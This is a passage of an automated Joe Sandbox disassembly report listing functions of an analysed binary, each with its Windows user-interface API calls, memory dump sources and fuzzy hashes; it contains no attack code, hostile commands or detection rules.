                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Rect$ClientCtrlLongScreen
                                                                              • String ID:
                                                                              • API String ID: 1315500227-0
                                                                              • Opcode ID: b3fd518fd9fdf67631462fa42361eea84ab9464b43585b00b648e15ad05a5b97
                                                                              • Instruction ID: 5d5fa3419f854359d74834599a88b1260502ef5eee545f2d7484c8e77a03edaf
                                                                              • Opcode Fuzzy Hash: b3fd518fd9fdf67631462fa42361eea84ab9464b43585b00b648e15ad05a5b97
                                                                              • Instruction Fuzzy Hash: F1118F71901119AFCB239F698D08EAFBBB8FF59314F504125F801EB240EB39DA058B91
                                                                              Function 00ED43E2 Relevance: 9.3, APIs: 6, Instructions: 254COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowRect.USER32(?,?), ref: 00ED4412
                                                                                • Part of subcall function 00EA5272: GetWindowLongA.USER32(00000000,000000EC), ref: 00EA527F
                                                                              • GetWindowRect.USER32(?,?), ref: 00ED4543
                                                                              • GetParent.USER32(?), ref: 00ED4550
                                                                              • GetParent.USER32(?), ref: 00ED456A
                                                                              • OffsetRect.USER32(?,00000000,00000000), ref: 00ED4629
                                                                              • OffsetRect.USER32(?,00000000,00000000), ref: 00ED4635
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$Window$OffsetParent$Long
                                                                              • String ID:
                                                                              • API String ID: 2171155602-0
                                                                              • Opcode ID: fdd80590a5a2194c42bcdf807d384c2a3272a07c46118d0ed411bc5b7a9d1f33
                                                                              • Instruction ID: a71a28e8706c0ab0fea625534c9a304b34a7c1e213a427db4f1e03a6e7da1766
                                                                              • Opcode Fuzzy Hash: fdd80590a5a2194c42bcdf807d384c2a3272a07c46118d0ed411bc5b7a9d1f33
                                                                              • Instruction Fuzzy Hash: DFA1E7B5E00219AFCF15CFA4D984AEDBBB5FF48310F14516AE816BB384DB35A941CB60
                                                                              Function 00ECE160 Relevance: 9.2, APIs: 6, Instructions: 212windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog3_GS.LIBCMT ref: 00ECE167
                                                                              • SetRectEmpty.USER32(?), ref: 00ECE193
                                                                              • GetWindowRect.USER32(?,?), ref: 00ECE241
                                                                              • IsWindowVisible.USER32(?), ref: 00ECE25E
                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00ECE2FF
                                                                              • SendMessageA.USER32(?,00000085,00000000,00000000), ref: 00ECE3E3
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: RectWindow$EmptyException@8H_prolog3_MessageSendThrowVisible
                                                                              • String ID:
                                                                              • API String ID: 1091622338-0
                                                                              • Opcode ID: b16b8cd2dc179583890f63ea852584c7894c4110bbfc4e8f3399b9b8ae185835
                                                                              • Instruction ID: f8693d8b23d89a7c6e034076152efed6e38a8d6cf889f049a847677a7f38620e
                                                                              • Opcode Fuzzy Hash: b16b8cd2dc179583890f63ea852584c7894c4110bbfc4e8f3399b9b8ae185835
                                                                              • Instruction Fuzzy Hash: 98719F70A01214AFDF19AF64D989FAD7BF9BF89710F041069F945BB392CB396901CB60
                                                                              Function 00FAC38F Relevance: 9.2, APIs: 6, Instructions: 161COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog3_GS.LIBCMT ref: 00FAC396
                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00FAC3E4
                                                                              • GetBoundsRect.GDI32(?,?,00000000,00000000), ref: 00FAC40D
                                                                              • CreateSolidBrush.GDI32 ref: 00FAC427
                                                                              • FillRect.USER32(00000000,?,?), ref: 00FAC440
                                                                              • FrameRgn.GDI32(00000000,?,?,00000001,00000001), ref: 00FAC502
                                                                                • Part of subcall function 00FAC5AE: FrameRgn.GDI32(00000000,00000000,00000000,00000001,00000001), ref: 00FAC5D9
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFrameRect$BoundsBrushCompatibleFillH_prolog3_Solid
                                                                              • String ID:
                                                                              • API String ID: 2549794613-0
                                                                              • Opcode ID: 14bb2fb3c96d8b3ea8fd5a981b49c85df121fadecd3806732b13451b5a708aae
                                                                              • Instruction ID: ee6a95f06ff0fa77477088ef28653d4d770ae7a3cb873a53eb40727eecfc8161
                                                                              • Opcode Fuzzy Hash: 14bb2fb3c96d8b3ea8fd5a981b49c85df121fadecd3806732b13451b5a708aae
                                                                              • Instruction Fuzzy Hash: 68518AB1D00209DFCF16EFA4C881AEEBBB5BF49300F044029F955BA245DB755A44EBA1
                                                                              Function 00E860F0 Relevance: 9.1, APIs: 6, Instructions: 114COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindResourceW.KERNEL32(1FFFFFFF,?,00000006,?,00000010,00E81D2C,?,00F45B1C,00000000,00000000,00000000,00000000,00000004,00F45AE2,1FFFFFFF,00000000), ref: 00E8610B
                                                                              • LoadResource.KERNEL32(1FFFFFFF,00000000,?,00000010,00E81D2C,?,00F45B1C,00000000,00000000,00000000,00000000,00000004,00F45AE2,1FFFFFFF,00000000,00000004), ref: 00E8611E
                                                                              • LockResource.KERNEL32(00000000,?,00000010,00E81D2C,?,00F45B1C,00000000,00000000,00000000,00000000,00000004,00F45AE2,1FFFFFFF,00000000,00000004,00000001), ref: 00E8612D
                                                                              • SizeofResource.KERNEL32(1FFFFFFF,00000000,?,00000010,00E81D2C,?,00F45B1C,00000000,00000000,00000000,00000000,00000004,00F45AE2,1FFFFFFF,00000000,00000004), ref: 00E86143
                                                                              • WideCharToMultiByte.KERNEL32(00000003,00000000,00000002,00000000,00000000,00000000,00000000,00000000,?,00000010,00E81D2C,?,00F45B1C,00000000,00000000,00000000), ref: 00E86184
                                                                              • WideCharToMultiByte.KERNEL32(00000003,00000000,00000002,00000000,00000000,00000000,00000000,00000000,?,00000010,00E81D2C,?,00F45B1C,00000000,00000000,00000000), ref: 00E861BF
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$ByteCharMultiWide$FindLoadLockSizeof
                                                                              • String ID:
                                                                              • API String ID: 1289833662-0
                                                                              • Opcode ID: dc6aa851fc74829a84b148f5cc950a0847cbdc38384e3a432ac9b3762471d815
                                                                              • Instruction ID: aac742bbfecbe22bf41f000fbf21d8d150312f09a1345a65552bdf205a2a34f9
                                                                              • Opcode Fuzzy Hash: dc6aa851fc74829a84b148f5cc950a0847cbdc38384e3a432ac9b3762471d815
                                                                              • Instruction Fuzzy Hash: E231B336701A146FEB22AF18DC49B7AB7A8EB40715F10401AF94DEF286DE75F901C760
                                                                              Function 00F1E0CE Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog3.LIBCMT ref: 00F1E0D5
                                                                              • SendDlgItemMessageA.USER32(R2,?,?,00000000,?), ref: 00F1E135
                                                                              • SendDlgItemMessageA.USER32(R2,0000037C,0000037C,?,?), ref: 00F1E1D8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: ItemMessageSend$H_prolog3
                                                                              • String ID: R2$R2
                                                                              • API String ID: 138487902-2086085159
                                                                              • Opcode ID: cd14d76c6ad228a2ee3f95780605b21b9c496a7a26ee7acd8b3916dbd660a4cd
                                                                              • Instruction ID: ec3ddb4dd7f1efbdf85aed226609e0b5a0993b144aacc26acb469ccb9b897345
                                                                              • Opcode Fuzzy Hash: cd14d76c6ad228a2ee3f95780605b21b9c496a7a26ee7acd8b3916dbd660a4cd
                                                                              • Instruction Fuzzy Hash: 2C318C71D00216ABDF219FA8CC42BFE76B1AF48710F244019FD94BB295DB789D82E764
                                                                              Function 00F4C149 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 84COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog3.LIBCMT ref: 00F4C150
                                                                                • Part of subcall function 00F5AC2B: __EH_prolog3.LIBCMT ref: 00F5AC32
                                                                                • Part of subcall function 00EA51D1: GetDlgCtrlID.USER32(?), ref: 00EA51DC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog3$Ctrl
                                                                              • String ID: %TsBasePane-%d$%TsBasePane-%d%x$BasePanes$IsVisible
                                                                              • API String ID: 3879667756-2169875744
                                                                              • Opcode ID: dd2041670b7e7e5c83bbc3907afebf3438835563ba9d7005bdb6d4da0ad29ba0
                                                                              • Instruction ID: c90196a46c497b7ef62da80e8f57216f9762f795bbaad251c49a71286af0207b
                                                                              • Opcode Fuzzy Hash: dd2041670b7e7e5c83bbc3907afebf3438835563ba9d7005bdb6d4da0ad29ba0
                                                                              • Instruction Fuzzy Hash: CA319071D00209AFCF05EFA4CD829EE7BB5BF48310F140569F955BB282DB395A05DBA0
                                                                              Function 00EE03ED Relevance: 7.7, APIs: 5, Instructions: 218COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog3_GS.LIBCMT ref: 00EE03F4
                                                                              • InflateRect.USER32(?,000000FF,00000000), ref: 00EE0499
                                                                              • OffsetRect.USER32(?,00000000,00000001), ref: 00EE0533
                                                                              • GetSysColor.USER32(0000000E), ref: 00EE0546
                                                                              • InflateRect.USER32(?,000000FD,00000000), ref: 00EE05ED
                                                                                • Part of subcall function 00EB9B27: __EH_prolog3.LIBCMT ref: 00EB9B2E
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$Inflate$ColorH_prolog3H_prolog3_Offset
                                                                              • String ID:
                                                                              • API String ID: 3491310817-0
                                                                              • Opcode ID: fb9646c3c0d0f1513735faa48f28ffc1877def9da7eac497c5b93e4de8611323
                                                                              • Instruction ID: d8699c9f1211a7c03ef2cb8310f8ecfbd3c6ab029dbc203ecba93c310a93276d
                                                                              • Opcode Fuzzy Hash: fb9646c3c0d0f1513735faa48f28ffc1877def9da7eac497c5b93e4de8611323
                                                                              • Instruction Fuzzy Hash: 69717A719006199FCF12CFA4C985AEEBBB5FF09310F140129E946BB284D7B5A94ACF90
                                                                              Function 00F7201D Relevance: 7.7, APIs: 5, Instructions: 174COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00EEE21F: GetCursorPos.USER32(00000000), ref: 00EEE25F
                                                                                • Part of subcall function 00EEE21F: OffsetRect.USER32(?,?,?), ref: 00EEE280
                                                                                • Part of subcall function 00EEE21F: RedrawWindow.USER32(?,00000000,00000000,00000105,?,00000000,?,?,?,?), ref: 00EEE2C3
                                                                              • TrackMouseEvent.USER32 ref: 00F720A1
                                                                              • InvalidateRect.USER32(00000000,?,00000001), ref: 00F72118
                                                                              • InvalidateRect.USER32(00000000,?,00000001), ref: 00F72191
                                                                              • UpdateWindow.USER32(00000000), ref: 00F721BA
                                                                              • RedrawWindow.USER32(00000000,?,00000000,00000105), ref: 00F721F7
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: RectWindow$InvalidateRedraw$CursorEventMouseOffsetTrackUpdate
                                                                              • String ID:
                                                                              • API String ID: 359670716-0
                                                                              • Opcode ID: 00c5129e4cf94c60444e4d744a4aab332830b068946d0475dba9487d59280ed5
                                                                              • Instruction ID: 78d284928e4d5d8125c2cda06e30da5e3155418ff715e49d7be71eca88a8412c
                                                                              • Opcode Fuzzy Hash: 00c5129e4cf94c60444e4d744a4aab332830b068946d0475dba9487d59280ed5
                                                                              • Instruction Fuzzy Hash: AD615B35A002099FCF52CF14C888BAE7BB6FF48720F194169EC196F255CB75AA41DF91
                                                                              Function 00EC41BC Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCursorPos.USER32(00000000), ref: 00EC41E3
                                                                              • ScreenToClient.USER32(?,00000000), ref: 00EC4211
                                                                              • ScreenToClient.USER32(?,?), ref: 00EC427F
                                                                              • PtInRect.USER32(00000000,?,?), ref: 00EC42B0
                                                                              • SetCursor.USER32(?), ref: 00EC42E4
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: ClientCursorScreen$Rect
                                                                              • String ID:
                                                                              • API String ID: 1082406499-0
                                                                              • Opcode ID: eef1e0d16e22aadce59d9ac5e0e9bbe236953378db906da5fa9654f1df4755f9
                                                                              • Instruction ID: e36e13ba132910d77f58878fa5d337f73e04420a387c6068a6ca64f59f04227d
                                                                              • Opcode Fuzzy Hash: eef1e0d16e22aadce59d9ac5e0e9bbe236953378db906da5fa9654f1df4755f9
                                                                              • Instruction Fuzzy Hash: 60418D71A0020ADFCF1AEBA0C955BFEB7B4BF48319F000129F405B7290DB3A9955CB90
                                                                              Function 00EB607B Relevance: 7.6, APIs: 5, Instructions: 85windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsWindowVisible.USER32(?), ref: 00EB60BB
                                                                              • SendMessageA.USER32(00000000,0000000B,00000000,00000000), ref: 00EB60EA
                                                                              • GetWindowRect.USER32(?,?), ref: 00EB60FD
                                                                              • SendMessageA.USER32(00000016,0000000B,00000001,00000000), ref: 00EB6153
                                                                              • RedrawWindow.USER32(00000185,00000000,00000000,00000185), ref: 00EB6169
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Window$MessageSend$RectRedrawVisible
                                                                              • String ID:
                                                                              • API String ID: 1695962874-0
                                                                              • Opcode ID: 0c938dc9f341d13a2444244fe93e953d1abbd37ee4126e4e87b035bf3b6b3176
                                                                              • Instruction ID: b272e3b05ca779fc902983788633055314124cece8baf073ab8249ae56ff9c75
                                                                              • Opcode Fuzzy Hash: 0c938dc9f341d13a2444244fe93e953d1abbd37ee4126e4e87b035bf3b6b3176
                                                                              • Instruction Fuzzy Hash: AD310AB1A00219AFDB21DF68CD84FAFB7B8FB08354F104659B56ABB295C775AD00CB50
                                                                              Function 00ECE3F0 Relevance: 7.6, APIs: 5, Instructions: 81windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageA.USER32(00000000,0000040D,00000000,00000000), ref: 00ECE42F
                                                                              • SendMessageA.USER32(00000000,0000040D,00000000,00000000), ref: 00ECE44F
                                                                              • SendMessageA.USER32(00000000,0000040D,00000000,00000000), ref: 00ECE491
                                                                                • Part of subcall function 00F52B41: SendMessageA.USER32(?,00000405,00000000,?), ref: 00F52B72
                                                                              • SendMessageA.USER32(00000000,0000040D,00000000,00000000), ref: 00ECE477
                                                                              • SetRectEmpty.USER32(?), ref: 00ECE4B3
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$EmptyRect
                                                                              • String ID:
                                                                              • API String ID: 4004678023-0
                                                                              • Opcode ID: 4c9cea088565d8d87c77a1a096e1dcda12698826fa3860f043bd47cbaca56193
                                                                              • Instruction ID: 1021314287c304a5321eaf41e888fc96e18b9201dfaa585cedafb70f99ba92c4
                                                                              • Opcode Fuzzy Hash: 4c9cea088565d8d87c77a1a096e1dcda12698826fa3860f043bd47cbaca56193
                                                                              • Instruction Fuzzy Hash: 2C21B1B1A00119BFD7159F64DE80FEABBB8FB08384F010269F965B7350C731AD118BA0
                                                                              Function 00EA63FF Relevance: 7.5, APIs: 5, Instructions: 44windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ScreenToClient.USER32(00000000,?), ref: 00EA640C
                                                                              • SendMessageA.USER32(00000000,00000366,00000000,?), ref: 00EA6428
                                                                              • ClientToScreen.USER32(00000000,?), ref: 00EA6435
                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 00EA643E
                                                                              • GetParent.USER32(00000000), ref: 00EA644C
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: ClientScreen$LongMessageParentSendWindow
                                                                              • String ID:
                                                                              • API String ID: 4240056119-0
                                                                              • Opcode ID: 84a3cfb50d6681a2aec58a4106c787b753f4e6f40a33d9a1112d4492a4a829f8
                                                                              • Instruction ID: b8a8370175c3d9756a94dc4125bbfe03908b2f45c5f26f2fbaf6e30ed08b3f46
                                                                              • Opcode Fuzzy Hash: 84a3cfb50d6681a2aec58a4106c787b753f4e6f40a33d9a1112d4492a4a829f8
                                                                              • Instruction Fuzzy Hash: FAF0D1361015247BD7230F199C04AFE376CFF4E761F058216FD25EA284DB39AD0183A0
                                                                              Function 00EC816E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 98windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog3_GS.LIBCMT ref: 00EC8178
